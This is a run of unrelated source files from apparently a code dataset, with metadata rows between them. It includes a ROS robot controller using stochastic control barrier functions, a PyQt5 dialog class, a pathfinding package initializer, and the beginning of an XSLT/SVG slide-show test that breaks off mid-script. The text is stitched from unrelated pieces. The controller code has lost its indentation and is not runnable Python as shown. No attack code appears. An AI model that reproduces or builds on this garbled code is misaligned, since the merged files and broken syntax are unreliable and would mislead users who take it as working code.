vx,vy = symbols('vx,vy')
# Vector of states and inputs:
self.x_r_s = Matrix([xr1,xr2,xr3])
self.x_o_s = Matrix([xo1,xo2])
self.u_s = Matrix([u1,u2])
self.u_o = Matrix([vx,vy])
self.f = Matrix([0,0,0])
self.g = Matrix([[cos(self.x_r_s[2]), -l*sin(self.x_r_s[2])], [sin(self.x_r_s[2]), l*cos(self.x_r_s[2])], [0, 1]])
self.f_r = self.f+self.g*self.u_s
self.l = l #approximation parameter for bicycle model
self.Real_x_r = lambdify([self.x_r_s], self.x_r_s-Matrix([l*cos(self.x_r_s[2]), l*sin(self.x_r_s[2]), 0]))
# Obstacle SDE, not needed if we want to use Keyvan prediction method
self.f_o = self.u_o
# self.f_o = Matrix([0.1, 0.1])
self.g_o = Matrix([0.1, 0.1])
self.g_o = 0.1*self.u_o
# self.f_o_fun = lambdify([self.x_o_s], self.f_o)
# self.g_o_fun = lambdify([self.x_o_s], self.g_o)
def GoalFuncs(self,GoalCenter,rGoal):
Gset = (self.x_r_s[0]-GoalCenter[0])**2+(self.x_r_s[1]-GoalCenter[1])**2-rGoal
GoalInfo = type('', (), {})()
GoalInfo.set = lambdify([self.x_r_s],Gset)
GoalInfo.Lyap = lambdify([self.x_r_s,self.u_s],Gset.diff(self.x_r_s).T*self.f_r)
return GoalInfo
def UnsafeFuncs(self,gamma,UnsafeRadius): #based on the SDE formulation, needs slight change for regular BF
UnsafeInfo = type('', (), {})()
Uset = (self.x_r_s[0]-self.x_o_s[0])**2+(self.x_r_s[1]-self.x_o_s[1])**2-(UnsafeRadius+self.l)**2
CBF = exp(-gamma*Uset)
CBF_d = CBF.diff(Matrix([self.x_r_s,self.x_o_s]))
CBF_d2 = CBF.diff(self.x_o_s,2)
UnsafeInfo.set = lambdify([self.x_r_s,self.x_o_s], Uset)
UnsafeInfo.CBF = lambdify([self.x_r_s,self.x_o_s], CBF)
UnsafeInfo.ConstCond = lambdify([self.x_r_s,self.x_o_s,self.u_o] , CBF_d.T*Matrix([self.f,self.f_o])+0.5*(self.g_o.T*Matrix([[Matrix(CBF_d2[0,0]),Matrix(CBF_d2[1,0])]])*self.g_o))
UnsafeInfo.multCond = lambdify([self.x_r_s,self.x_o_s,self.u_s], CBF_d.T*Matrix([self.g*self.u_s, Matrix(np.zeros((len(self.x_o_s),1)))]))
return UnsafeInfo
def MapFuncs(self,env_bounds):
MapInfo = type('', (), {})()
MapInfo.set = []
MapInfo.CBF = []
MapInfo.setDer = []
# x_min = getattr(env_bounds, "x_min", undefined)
# x_max = getattr(env_bounds, "x_max", undefined)
# y_min = getattr(env_bounds, "y_min", undefined)
# y_max = getattr(env_bounds, "y_max", undefined)
if hasattr(env_bounds,'x_min'):
Uset = (-self.x_r_s[0]+env_bounds.x_min)
CBF = exp(gamma*Uset)
MapInfo.set.append(lambdify([self.x_r_s], Uset))
MapInfo.CBF.append(lambdify([self.x_r_s],CBF))
MapInfo.setDer.append(lambdify([self.x_r_s,self.u_s] , CBF.diff(self.x_r_s).T*self.f_r))
if hasattr(env_bounds,'x_max'):
Uset = (self.x_r_s[0]-env_bounds.x_max)
CBF = exp(gamma*Uset)
MapInfo.set.append(lambdify([self.x_r_s], Uset))
MapInfo.CBF.append(lambdify([self.x_r_s],CBF))
MapInfo.setDer.append(lambdify([self.x_r_s,self.u_s] , CBF.diff(self.x_r_s).T*self.f_r))
if hasattr(env_bounds,'y_min'):
Uset = (-self.x_r_s[1]+env_bounds.y_min)
CBF = exp(gamma*Uset)
MapInfo.set.append(lambdify([self.x_r_s], Uset))
MapInfo.CBF.append(lambdify([self.x_r_s],CBF))
MapInfo.setDer.append(lambdify([self.x_r_s,self.u_s] , CBF.diff(self.x_r_s).T*self.f_r))
if hasattr(env_bounds,'y_max'):
Uset = (self.x_r_s[1]-env_bounds.y_max)
CBF = exp(gamma*Uset)
MapInfo.set.append(lambdify([self.x_r_s], Uset))
MapInfo.CBF.append(lambdify([self.x_r_s],CBF))
MapInfo.setDer.append(lambdify([self.x_r_s,self.u_s] , CBF.diff(self.x_r_s).T*self.f_r))
if hasattr(env_bounds,'f'):
pass #To be filled later
return MapInfo
class CBF_CONTROLLER(object):
def __init__(self,robot,GoalInfo,UnsafeInfo,MapInfo):
        # publisher to send v/w velocity commands to the HSR
self.vw_publisher = rospy.Publisher('/hsrb/command_velocity', Twist, queue_size=10)
# subscriber for Gazebo info.
rospy.wait_for_service ('/gazebo/get_model_state')
self.get_model_pro = rospy.ServiceProxy('/gazebo/get_world_properties', GetWorldProperties)
self.get_model_srv = rospy.ServiceProxy('/gazebo/get_model_state', GetModelState)
self.tOdometry_subscriber = rospy.Subscriber('/hsrb/odom_ground_truth', Odometry, self.tOdometry_callback, queue_size=10)
self.tOdometry = Odometry()
self.odometry_subscriber = rospy.Subscriber('/global_pose', PoseStamped, self.odometry_callback, queue_size=10)
self.poseStamped = PoseStamped()
# listener of tf.
self.tfListener = tf.TransformListener()
self.actors = []
trajs = type('', (), {})()
trajs.hsr = []
trajs.actors = []
trajs.commands = []
trajs.time = []
trajs.risk = []
trajs.minDist = []
self.trajs = trajs
self.robot = robot
self.GoalInfo = GoalInfo
self.UnsafeInfo = UnsafeInfo
self.MapInfo = MapInfo
self.flag = 0
self.count = 0 # num of times control_callback is called
def __del__(self):
pass
def tOdometry_callback(self, odometry):
        self.odometry = odometry # this odometry's coordinates are in the /map frame
def odometry_callback(self, poseStamped):
self.poseStamped = poseStamped
def gazebo_pos_transformPose(self, frame_id, gazebo_pose):
gazebo_pose_temp = PoseStamped()
gazebo_pose_temp.header = gazebo_pose.header
gazebo_pose_temp.header.frame_id = 'map'
gazebo_pose_temp.pose = gazebo_pose.pose
while not rospy.is_shutdown():
try:
gazebo_pos_trans = self.tfListener.transformPose(frame_id, gazebo_pose_temp)
break
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
return gazebo_pos_trans
def controller_loop_callback(self, event):
        # the controller loop callback.
self.count += 1
now = rospy.get_rostime()
self.trajs.time.append(now.secs+now.nsecs*pow(10,-9))
if DEBUG:
rospy.loginfo('Current time %i %i', now.secs, now.nsecs)
rospy.loginfo('tOdometry\n %s', self.odometry)
# get human model state from Gazebo
if self.count==1:
model_properties = self.get_model_pro()
for model_name in model_properties.model_names:
                if re.search('actor', model_name) and model_name not in self.actors: # catch any Gazebo model whose name starts with actor
self.actors.append(model_name)
actors_data = []
for actor in self.actors:
model_actor = GetModelStateRequest()
model_actor.model_name = actor
            model_actor = self.get_model_srv(model_actor) # the pose data is in the /map frame
# actor_base_footprint_pose = self.gazebo_pos_transformPose('base_footprint', model_actor) # trasfer /map->/base_footprint
            angular = orientation2angular(model_actor.pose.orientation) # convert orientation (quaternion) -> angular (Euler)
p = model_actor.pose.position
actors_data.append([p.x,p.y, angular.z])
            if DEBUG:
                rospy.loginfo('%s in timestamp:\n%s', actor, model_actor.header.stamp) # time stamp is here.
                rospy.loginfo('%s position:\n%s\nangular:\n%s', actor, p, angular)
self.trajs.actors.append(actors_data)
# get hsr model state from odometry
model_hsr = self.odometry
p = model_hsr.pose.pose.position
        angular = orientation2angular(model_hsr.pose.pose.orientation) # convert orientation (quaternion) -> angular (Euler)
x_r = [p.x,p.y,angular.z]
self.trajs.hsr.append(x_r)
# making vw data and publish it.
vel_msg = Twist()
# Compute controller
if abs(p.x)<1.5 and self.flag == 0:
self.flag = 1
env_bounds = type('', (), {})()
env_bounds.x_max = 1.2
env_bounds.x_min = -1.3
self.MapInfo = self.robot.MapFuncs(env_bounds)
GoalCenter = np.array([0, 5.5])
self.GoalInfo = self.robot.GoalFuncs(GoalCenter,rGoal)
u = self.cbf_controller_compute()
vel_msg.linear.x = u[0]
vel_msg.angular.z = u[1]
self.vw_publisher.publish(vel_msg)
self.trajs.commands.append([u[0],u[1]])
if self.count > 1000:
rospy.loginfo('reach counter!!')
rospy.signal_shutdown('reach counter')
elif self.GoalInfo.set(x_r)<0:
rospy.loginfo('reached Goal set!!')
rospy.signal_shutdown('reached Goal set')
def cbf_controller_compute(self):
x_r = np.array(self.trajs.hsr[len(self.trajs.hsr)-1])
x_o = np.array(self.trajs.actors[len(self.trajs.actors)-1])
u_s = self.robot.u_s
if self.count>3:
x_o_pre = np.array(self.trajs.actors[len(self.trajs.actors)-4])
# x_o_2pre = np.array(self.trajs.actors[len(self.trajs.actors)-3])
dt = self.trajs.time[len(self.trajs.time)-1]-self.trajs.time[len(self.trajs.time)-4]
u_o = (x_o[:,0:2]-x_o_pre[:,0:2])/dt
else:
u_o = np.zeros((len(x_o),len(self.robot.u_o)))
Unsafe = self.UnsafeInfo
Goal = self.GoalInfo
Map = self.MapInfo
UnsafeList = []
Dists = np.zeros((len(x_o)))
for j in range(len(x_o)):
Dists[j] = Unsafe.set(x_r, x_o[j][0:2])
if Dists[j]<UnsafeInclude:
UnsafeList.append(j)
ai = 1
if min(Dists)<0:
InUnsafe = 1
else:
InUnsafe = 0
minDist = min(Dists)
minJ = np.where(Dists == minDist)
if findBestCommandAnyway:
#Ax<=b, x = [v, w , b1,bh1 b2, bh2..., bn, b'1, b'2,b'm, delta ]
# where b is constant in Eq (14) of paper "Risk-bounded Control using Stochastic Barrier Functions"
#b' is the slack variable for map constraints
# delta is for lyapunov function
A = np.zeros((2*len(UnsafeList)+2*len(u_s)+len(Map.set)+2,len(u_s)+2*len(UnsafeList)+len(Map.set)+1))
b =np.zeros((2*len(u_s)+2*len(UnsafeList)+len(Map.set)+2))
for j in range(len(UnsafeList)):
# CBF Constraints
A[2*j,np.append(np.arange(len(u_s)),[len(u_s)+2*j])] = [Unsafe.multCond(x_r, x_o[UnsafeList[j]][0:2],[1, 0]), Unsafe.multCond(x_r,x_o[UnsafeList[j]][0:2],[0, 1]), -1] # multiplier of u , bi
b[2*j] = -ai* Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2])- Unsafe.ConstCond(x_r, x_o[UnsafeList[j]][0:2],u_o[UnsafeList[j]])
# Constraints on bi to satisfy pi risk
A[2*j+1,len(u_s)+2*j] = 1; A[2*j+1,len(u_s)+2*j+1] = -1
if Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2])<1:
b[2*j+1] = min(ai, -1/T*log((1-risk)/(1-Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2]))))
else:
b[2*j+1] = 0
# Adding U constraint
A[2*len(UnsafeList),0] = 1; b[2*len(UnsafeList)] = U[0,1]
A[2*len(UnsafeList)+1,0] = -1; b[2*len(UnsafeList)+1] = -U[0,0]
A[2*len(UnsafeList)+2,1] = 1; b[2*len(UnsafeList)+2] = U[1,1]
A[2*len(UnsafeList)+3,1] = -1; b[2*len(UnsafeList)+3] = -U[1,0]
# Adding map constraints
for j in range(len(Map.set)):
A[2*len(UnsafeList)+2*len(u_s)+j,np.append(np.arange(len(u_s)),[len(u_s)+2*len(UnsafeList)+j])] = [Map.setDer[j](x_r,[1, 0]), Map.setDer[j](x_r,[0, 1]), -1]
b[2*len(UnsafeList)+2*len(u_s)+j] = -Map.CBF[j](x_r)
            # Adding goal-based Lyapunov constraint (example-specific: change for a different goal)
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set),0:2] = [Goal.Lyap(x_r,[1,0]), Goal.Lyap(x_r,[0, 1])]
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set),-1] = -1
b[2*len(UnsafeList)+2*len(u_s)+len(Map.set)] = 0
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set)+1,-1] = 1
b[2*len(UnsafeList)+2*len(u_s)+len(Map.set)+1] = np.finfo(float).eps+1
H = np.zeros((len(u_s)+2*len(UnsafeList)+len(Map.set)+1,len(u_s)+2*len(UnsafeList)+len(Map.set)+1))
H[0,0] = 0
H[1,1] = 0
ff = np.zeros((len(u_s)+2*len(UnsafeList)+len(Map.set)+1,1))
for j in range(len(UnsafeList)):
ff[len(u_s)+2*j] = 65
H[len(u_s)+2*j+1,len(u_s)+2*j+1] = 10000
# ff[len(u_s)+2*j+1] = 50* Unsafe.CBF(x_r, x_o[minJ[0][0]][0:2])
ff[len(u_s)+2*len(UnsafeList):len(u_s)+2*len(UnsafeList)+len(Map.set)] = 20
ff[-1] = np.ceil(self.count/100.0)
else:
#Ax<=b, x = [v, w , b1, b2,..., bn, b'1, b'2,b'm, delta ]
# where b is constant in Eq (14) of paper "Risk-bounded Control using Stochastic Barrier Functions"
#b' is the slack variable for map constraints
# delta is for lyapunov function
A = np.zeros((2*len(UnsafeList)+2*len(u_s)+len(Map.set)+2,len(u_s)+len(UnsafeList)+len(Map.set)+1))
b =np.zeros((2*len(u_s)+2*len(UnsafeList)+len(Map.set)+2))
for j in range(len(UnsafeList)):
# CBF Constraints
A[2*j,np.append(np.arange(len(u_s)),[len(u_s)+j])] = [Unsafe.multCond(x_r, x_o[UnsafeList[j]][0:2],[1, 0]), Unsafe.multCond(x_r,x_o[UnsafeList[j]][0:2],[0, 1]), -1] # multiplier of u , bi
b[2*j] = -ai* Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2])- Unsafe.ConstCond(x_r, x_o[UnsafeList[j]][0:2],u_o[UnsafeList[j]])
# Constraints on bi to satisfy pi risk
A[2*j+1,len(u_s)+j] = 1
if Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2])<1:
b[2*j+1] = min(ai, -1/T*log((1-risk)/(1-Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2]))))
else:
b[2*j+1] = 0
# Adding U constraint
A[2*len(UnsafeList),0] = 1; b[2*len(UnsafeList)] = U[0,1]
A[2*len(UnsafeList)+1,0] = -1; b[2*len(UnsafeList)+1] = -U[0,0]
A[2*len(UnsafeList)+2,1] = 1; b[2*len(UnsafeList)+2] = U[1,1]
A[2*len(UnsafeList)+3,1] = -1; b[2*len(UnsafeList)+3] = -U[1,0]
# Adding map constraints
for j in range(len(Map.set)):
A[2*len(UnsafeList)+2*len(u_s)+j,np.append(np.arange(len(u_s)),[len(u_s)+len(UnsafeList)+j])] = [Map.setDer[j](x_r,[1, 0]), Map.setDer[j](x_r,[0, 1]), -1]
b[2*len(UnsafeList)+2*len(u_s)+j] = -Map.CBF[j](x_r)
            # Adding goal-based Lyapunov constraint (example-specific: change for a different goal)
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set),0:2] = [Goal.Lyap(x_r,[1,0]), Goal.Lyap(x_r,[0, 1])]
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set),-1] = -1
b[2*len(UnsafeList)+2*len(u_s)+len(Map.set)] = 0
A[2*len(UnsafeList)+2*len(u_s)+len(Map.set)+1,-1] = 1
b[2*len(UnsafeList)+2*len(u_s)+len(Map.set)+1] = np.finfo(float).eps+1
H = np.zeros((len(u_s)+len(UnsafeList)+len(Map.set)+1,len(u_s)+len(UnsafeList)+len(Map.set)+1))
H[0,0] = 0
H[1,1] = 0
ff = np.zeros((len(u_s)+len(UnsafeList)+len(Map.set)+1,1))
ff[len(u_s):len(u_s)+len(UnsafeList)] = 20
ff[len(u_s)+len(UnsafeList):len(u_s)+len(UnsafeList)+len(Map.set)] = 10
ff[-1] = np.ceil(self.count/100.0)
try:
uq = cvxopt_solve_qp(H, ff, A, b)
except ValueError:
uq = [0,0]
rospy.loginfo('Domain Error in cvx')
if uq is None:
uq = [0,0]
rospy.loginfo('infeasible QP')
if findBestCommandAnyway and len(uq[2:len(uq)-2*len(Map.set)-1:2])>0: # If humans are around and findbestcommand active
if InUnsafe:
self.trajs.risk.append(1.0)
else:
r = np.zeros(len(uq[2:len(uq)-2*len(Map.set)-1:2]))
for k in range(len(uq[2:len(uq)-2*len(Map.set)-1:2])):
r[k] = min(1, max(0,1-(1-Unsafe.CBF(x_r, x_o[UnsafeList[k]][0:2]))*exp(-uq[2*k+2]*T)))
self.trajs.risk.append(max(r))
elif not findBestCommandAnyway and len(uq[2:len(uq)-len(Map.set)-1])>0:
r = np.zeros(len(uq[2:len(uq)-len(Map.set)-1]))
for k in range(len(uq[2:len(uq)-len(Map.set)-1])):
r[k] = min(1, max(0,1-(1-Unsafe.CBF(x_r, x_o[UnsafeList[k]][0:2]))*exp(-uq[k+2]*T)))
self.trajs.risk.append(max(r))
            if max(r)>0.1:
                pass  # no-op placeholder
elif not findBestCommandAnyway and len(uq) == 2: # feasible solution is not found
self.trajs.risk.append(-risk) # meaning that solution is not found
else: # No human is around
self.trajs.risk.append(0.0)
self.trajs.minDist.append(minDist)
return uq
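# Note (added): the per-obstacle risk computed above instantiates the stochastic-CBF
# bound r = 1 - (1 - h(x)) * exp(-b*T), with h the barrier value and b the QP slack
# (cf. the Eq (14) reference in the comments above).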
if __name__ == '__main__':
## Parameters
    findBestCommandAnyway = 1 # 0: do nothing when the command is riskier than intended;
    # 1: execute the best available command even if it exceeds the risk bound
plotanimation = 0
# Goal info
GoalCenter = np.array([0, 0])
rGoal = np.power(0.5,2)
# Unsafe
    UnsafeInclude = 9 # consider an obstacle only if it is within this radius
UnsafeRadius = 0.5 #radius of unsafe sets/distance from obstacles
    # Environment bounds
env_bounds = type('', (), {})()
env_bounds.y_min = -1.2
env_bounds.y_max = 1
# env_bounds.x_max = 1.25
# env_bounds.x_min = -1.35
l = 0.01 #bicycle model approximation parameter
U = np.array([[-0.33,0.33],[-0.3,0.3]])
T = 1 #Lookahead horizon
risk = 0.1 # max risk desired
gamma = 5 # CBF coefficient
u1d = 0 # desired input to save energy!
# Plotting options
plotit = 1
plotlanes = 1
robot = robot(l)
GoalInfo = robot.GoalFuncs(GoalCenter,rGoal)
UnsafeInfo = robot.UnsafeFuncs(gamma,UnsafeRadius)
MapInfo = robot.MapFuncs(env_bounds)
# Process arguments
p = argparse.ArgumentParser(description='CBF controller')
args = p.parse_args(rospy.myargv()[1:])
try:
rospy.init_node('cbf_controller')
cbf_controller = CBF_CONTROLLER(robot,GoalInfo,UnsafeInfo,MapInfo)
        control_period = 0.05 #[sec] the control period can be changed with this parameter
        rospy.Timer(rospy.Duration(control_period), cbf_controller.controller_loop_callback)
rospy.spin()
except rospy.ROSInterruptException:
pass
plottrajs(cbf_controller.trajs)
| 51.393773
| 222
| 0.490218
| 21,357
| 0.761092
| 0
| 0
| 0
| 0
| 0
| 0
| 4,187
| 0.149211
|
4262af6285d912525c9c840db4e454a16f646f01
| 5,250
|
py
|
Python
|
src/gui/ui_paste_dialog.py
|
tonypdmtr/sxtool
|
225468d70c5fe1bf7414f19ce13dcdd43e872433
|
[
"BSD-2-Clause"
] | 3
|
2018-10-11T15:34:24.000Z
|
2022-02-20T23:24:01.000Z
|
src/gui/ui_paste_dialog.py
|
tonypdmtr/sxtool
|
225468d70c5fe1bf7414f19ce13dcdd43e872433
|
[
"BSD-2-Clause"
] | 1
|
2018-10-16T06:58:22.000Z
|
2018-10-22T20:19:55.000Z
|
src/gui/ui_paste_dialog.py
|
tonypdmtr/sxtool
|
225468d70c5fe1bf7414f19ce13dcdd43e872433
|
[
"BSD-2-Clause"
] | 1
|
2022-02-20T23:26:50.000Z
|
2022-02-20T23:26:50.000Z
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'src/gui/ui_paste_dialog.ui'
#
# Created by: PyQt5 UI code generator 5.11.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_PasteDialog(object):
def setupUi(self, PasteDialog):
PasteDialog.setObjectName("PasteDialog")
PasteDialog.resize(403, 205)
self.gridLayout = QtWidgets.QGridLayout(PasteDialog)
self.gridLayout.setContentsMargins(11, 11, 11, 11)
self.gridLayout.setSpacing(6)
self.gridLayout.setObjectName("gridLayout")
self.buttonGroupMain = QtWidgets.QGroupBox(PasteDialog)
self.buttonGroupMain.setObjectName("buttonGroupMain")
self.radioReplaceSelection = QtWidgets.QRadioButton(self.buttonGroupMain)
self.radioReplaceSelection.setGeometry(QtCore.QRect(10, 40, 120, 20))
self.radioReplaceSelection.setObjectName("radioReplaceSelection")
self.radioAddLines = QtWidgets.QRadioButton(self.buttonGroupMain)
self.radioAddLines.setGeometry(QtCore.QRect(10, 20, 100, 20))
self.radioAddLines.setChecked(True)
self.radioAddLines.setObjectName("radioAddLines")
self.gridLayout.addWidget(self.buttonGroupMain, 0, 0, 1, 1)
self.buttonGroupReplace = QtWidgets.QGroupBox(PasteDialog)
self.buttonGroupReplace.setEnabled(False)
self.buttonGroupReplace.setObjectName("buttonGroupReplace")
self.verticalLayout = QtWidgets.QVBoxLayout(self.buttonGroupReplace)
self.verticalLayout.setContentsMargins(11, 11, 11, 11)
self.verticalLayout.setSpacing(6)
self.verticalLayout.setObjectName("verticalLayout")
self.radioSelectionOnly = QtWidgets.QRadioButton(self.buttonGroupReplace)
self.radioSelectionOnly.setObjectName("radioSelectionOnly")
self.verticalLayout.addWidget(self.radioSelectionOnly)
self.radioSelectionAndReplace = QtWidgets.QRadioButton(self.buttonGroupReplace)
self.radioSelectionAndReplace.setObjectName("radioSelectionAndReplace")
self.verticalLayout.addWidget(self.radioSelectionAndReplace)
self.radioSelectionAndAdd = QtWidgets.QRadioButton(self.buttonGroupReplace)
self.radioSelectionAndAdd.setChecked(True)
self.radioSelectionAndAdd.setObjectName("radioSelectionAndAdd")
self.verticalLayout.addWidget(self.radioSelectionAndAdd)
self.gridLayout.addWidget(self.buttonGroupReplace, 0, 1, 2, 1)
self.buttonGroupAdd = QtWidgets.QGroupBox(PasteDialog)
self.buttonGroupAdd.setEnabled(True)
self.buttonGroupAdd.setObjectName("buttonGroupAdd")
self.radioAfterSelection = QtWidgets.QRadioButton(self.buttonGroupAdd)
self.radioAfterSelection.setGeometry(QtCore.QRect(10, 40, 130, 20))
self.radioAfterSelection.setObjectName("radioAfterSelection")
self.radioBeforeSelection = QtWidgets.QRadioButton(self.buttonGroupAdd)
self.radioBeforeSelection.setGeometry(QtCore.QRect(10, 20, 140, 20))
self.radioBeforeSelection.setChecked(True)
self.radioBeforeSelection.setObjectName("radioBeforeSelection")
self.gridLayout.addWidget(self.buttonGroupAdd, 1, 0, 1, 1)
self.pushOk = QtWidgets.QPushButton(PasteDialog)
self.pushOk.setObjectName("pushOk")
self.gridLayout.addWidget(self.pushOk, 2, 0, 1, 1)
self.pushCancel = QtWidgets.QPushButton(PasteDialog)
self.pushCancel.setObjectName("pushCancel")
self.gridLayout.addWidget(self.pushCancel, 2, 1, 1, 1)
self.retranslateUi(PasteDialog)
self.pushOk.clicked.connect(PasteDialog.accept)
self.pushCancel.clicked.connect(PasteDialog.reject)
self.radioAddLines.toggled['bool'].connect(self.buttonGroupAdd.setEnabled)
self.radioReplaceSelection.toggled['bool'].connect(self.buttonGroupReplace.setEnabled)
QtCore.QMetaObject.connectSlotsByName(PasteDialog)
def retranslateUi(self, PasteDialog):
_translate = QtCore.QCoreApplication.translate
PasteDialog.setWindowTitle(_translate("PasteDialog", "Paste mode"))
self.buttonGroupMain.setTitle(_translate("PasteDialog", "Pasting mode"))
self.radioReplaceSelection.setText(_translate("PasteDialog", "Replace selection"))
self.radioAddLines.setText(_translate("PasteDialog", "Add lines"))
self.buttonGroupReplace.setTitle(_translate("PasteDialog", "How do you want to replace lines ?"))
self.radioSelectionOnly.setText(_translate("PasteDialog", "Selection only"))
self.radioSelectionAndReplace.setText(_translate("PasteDialog", "If selection is too small, replace\n"
"the lines after"))
self.radioSelectionAndAdd.setText(_translate("PasteDialog", "If selection is too small, \n"
"add new lines"))
self.buttonGroupAdd.setTitle(_translate("PasteDialog", "Where do you want to add lines ?"))
self.radioAfterSelection.setText(_translate("PasteDialog", "After selection"))
self.radioBeforeSelection.setText(_translate("PasteDialog", "Before selection"))
self.pushOk.setText(_translate("PasteDialog", "OK"))
self.pushCancel.setText(_translate("PasteDialog", "Cancel"))
| 58.333333
| 110
| 0.739619
| 4,992
| 0.950857
| 0
| 0
| 0
| 0
| 0
| 0
| 938
| 0.178667
|
4262ea9b91c2ce1c0da94f2913617caab9285e6f
| 110
|
py
|
Python
|
app/pathfinding/finder/__init__.py
|
TheronHa/Spaghetti
|
e181c2f7ea0c044fb7d0edb36bd203dac2eabaf9
|
[
"MIT"
] | 208
|
2017-01-23T17:45:13.000Z
|
2022-03-22T22:27:25.000Z
|
app/pathfinding/finder/__init__.py
|
TheronHa/Spaghetti
|
e181c2f7ea0c044fb7d0edb36bd203dac2eabaf9
|
[
"MIT"
] | 31
|
2017-10-28T09:21:06.000Z
|
2021-09-26T15:38:36.000Z
|
app/pathfinding/finder/__init__.py
|
TheronHa/Spaghetti
|
e181c2f7ea0c044fb7d0edb36bd203dac2eabaf9
|
[
"MIT"
] | 60
|
2016-12-13T00:05:36.000Z
|
2022-03-21T22:23:49.000Z
|
__all__ = ['a_star', 'best_first', 'bi_a_star', 'breadth_first', 'dijkstra',
'finder', 'ida_star']
| 36.666667
| 76
| 0.609091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 74
| 0.672727
|
4263245bfbde431be1ac8c88739a3f1f392bf22f
| 34,891
|
py
|
Python
|
dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/uo_20000929.py
|
aleasims/Peach
|
bb56841e943d719d5101fee0a503ed34308eda04
|
[
"MIT"
] | null | null | null |
dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/uo_20000929.py
|
aleasims/Peach
|
bb56841e943d719d5101fee0a503ed34308eda04
|
[
"MIT"
] | null | null | null |
dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/uo_20000929.py
|
aleasims/Peach
|
bb56841e943d719d5101fee0a503ed34308eda04
|
[
"MIT"
] | 1
|
2020-07-26T03:57:45.000Z
|
2020-07-26T03:57:45.000Z
|
#Uche's test from Sun's SVG slide publisher
import os
from Xml.Xslt import test_harness
#From Sun's toolkit
sheet_1_uri = "Xml/Xslt/Borrowed/svgslides.xsl"
sheet_2_uri = "Xml/Xslt/Borrowed/svgslides_custom.xsl"
sheet_3_uri = "Xml/Xslt/Borrowed/slidescript.xsl"
source_1_uri = "Xml/Xslt/Borrowed/slides4svg.xml"
saxon_output = """"""
expected_1 = """<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="slides.css" type="text/css"?>
<svg height='768' width='1024' style='pointer-events:visible' xml:space='preserve' onload='initSlides(evt)' xmlns:xlink='http://www.w3.org/2000/xlink/namespace/'>
<script><![CDATA[
var doc = null;
// Called upon presentation loading
function initSlides(evt){
var target = evt.getTarget();
doc = target.getOwnerDocument();
hideAndShow(evt, curSlide, curSlide);
}
function onPrevSlide(evt){
// Process new current slide
var oldCurSlide = curSlide;
curSlide = curSlide - 1;
if(curSlide < 0){
curSlide = slideList.length - 1;
}
hideAndShow(evt, oldCurSlide, curSlide);
}
function onNextSlide(evt){
// Process new current slide
var prevSlide = curSlide;
curSlide = curSlide + 1;
if(curSlide > (slideList.length - 1)){
curSlide = 0;
}
hideAndShow(evt, prevSlide, curSlide);
// alert("onNextSlide");
}
function hideAndShow(evt, hideSlide, showSlide){
// alert("Hiding : " + hideSlide + " and showing : " + showSlide);
// Hide previous current slide and show new
// one.
var hideSlideName = slideList[hideSlide];
var showSlideName = slideList[showSlide];
/*if(hideSlideName == null)
alert("hideSlideName is null");
else
alert("hideSlideName is NOT null:" + hideSlideName);*/
var slideGroup = doc.getElementById(hideSlideName);
slideGroup.setAttribute("style", "visibility:hidden");
slideGroup = doc.getElementById(showSlideName);
slideGroup.setAttribute("style", "visibility:show");
var slideMenuItemId = slideList[hideSlide] + "MenuItem";
var menuItem = doc.getElementById(slideMenuItemId);
if(menuItem != null)
menuItem.setAttribute("class", "slideMenuItem");
slideMenuItemId = slideList[showSlide] + "MenuItem";
menuItem = doc.getElementById(slideMenuItemId);
if(menuItem != null)
menuItem.setAttribute("class", "currentSlideMenuItem");
}
function onHighlightMenuItem(evt, highlight, itemId){
var target = evt.getTarget();
var doc = target.getOwnerDocument();
var menuItem = doc.getElementById(itemId);
if(highlight == "true")
menuItem.setAttribute("class", "highlightedSlideMenuItem");
else{
var curSlideMenuItemId = slideList[curSlide] + "MenuItem";
if(curSlideMenuItemId == itemId)
menuItem.setAttribute("class", "currentSlideMenuItem");
else
menuItem.setAttribute("class", "slideMenuItem");
}
}
function onMenuItemSelected(evt, index){
// alert("Should show slide # " + index);
var oldCurSlide = curSlide;
curSlide = index;
hideAndShow(evt, oldCurSlide, index);
}
function onSetFill(evt, elementId, fillValue){
var element = doc.getElementById(elementId);
element.setAttribute("style", "fill:" + fillValue);
}
function onExpand(evt, submenuGroupId){
var submenuGroup = doc.getElementById(submenuGroupId);
submenuGroup.setAttribute("style", "visibility:hidden");
var javaScriptCode = "window.expandNow('" + submenuGroupId + "')";
window.expandNow = expandNow;
setTimeout(javaScriptCode, 1000);
}
function expandNow(submenuGroupId){
var submenuGroup = doc.getElementById(submenuGroupId);
submenuGroup.setAttribute("style", "visibility:show");
}
function onCollapse(evt, submenuGroupId){
var submenuGroup = doc.getElementById(submenuGroupId);
submenuGroup.setAttribute("style", "visibility:hidden");
}
]]></script>
<script><![CDATA[
var slideList = new Array();
var slideIndex = new Object();
var curSlide = 0;
slideList[0]="slideShowCover";
slideIndex["slideShowCover"] = 0;
slideList[1]="slidesetCover1";
slideIndex["slidesetCover1"] = 1;
slideList[2] = "slide1-1";
slideIndex["slide1-1"] = 2;
slideList[3]="slidesetCover2";
slideIndex["slidesetCover2"] = 3;
slideList[4] = "slide2-1";
slideIndex["slide2-1"] = 4;
slideList[5] = "slide2-2";
slideIndex["slide2-2"] = 5;
slideList[6] = "slide2-3";
slideIndex["slide2-3"] = 6;
slideList[7]="slidesetCover3";
slideIndex["slidesetCover3"] = 7;
slideList[8] = "slide3-1";
slideIndex["slide3-1"] = 8;
slideList[9] = "slide3-2";
